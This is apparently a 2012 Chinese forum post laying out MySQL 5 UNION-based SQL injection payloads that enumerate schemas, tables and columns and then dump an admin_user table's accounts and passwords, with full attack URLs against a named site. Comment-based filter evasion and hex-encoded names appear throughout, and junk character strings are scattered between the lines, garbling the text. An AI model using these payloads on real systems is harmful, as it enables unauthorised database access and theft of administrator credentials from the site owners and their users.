查库
8 l* F+ T5 w) t4 x/ t; _& s! b6 n- {2 q0 B9 r
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*: P5 I8 b# X' W3 }, N' f+ B' p' h
8 N* U4 ^' ?9 Z5 n+ R8 [
查表
+ \- R+ u5 S$ J3 O' U# q' t
7 r2 a1 \7 y, M4 v2 J+ kid=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,11 }6 ~: |; [7 l( h
; C% f+ X' l* a$ {' |- [
查段
( L% @' ~; ^7 u1 b9 [7 B
1 B" L, ?4 J" r5 h& Xid=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,19 W# w6 H; ?3 l* T! U1 `+ x
M8 }7 h) W4 a. w6 T2 o1 l* q* A) l, b ?
mysql5高级注入方法暴表
4 D# b' n5 Z+ k) v0 `; Q$ d& D ~ Q8 S5 G) `
例子如下:
2 _( u5 n/ } L4 Z4 T) i0 v) t m. K0 `. ~$ Q( A
1.爆表
7 d6 b+ s3 ?& X5 u8 Z! O( Rhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)8 U5 K6 v- E1 d8 j$ y4 v
这样爆到第4个时出现了admin_user表。- Y+ [2 k0 o/ M# V$ m
) {+ t8 O; i! y4 I2.暴字段( x; P* Y* N- f- B0 |2 h& R: G
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
/ C* o- R7 L3 F' e4 K+ L3 _& ]* B$ k( s& n) f' h3 g+ x) f* G
* {: J' Z: _# u7 C
3.爆密码1 f% N" F6 D- n% D
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
" |, ]; q+ [! r6 w) ]8 c- k0 ^5 [* G- t4 l
. F, l6 c* I8 V* z* A5 y |
发表于 2012-9-13 16:29:37
收藏
支持
反对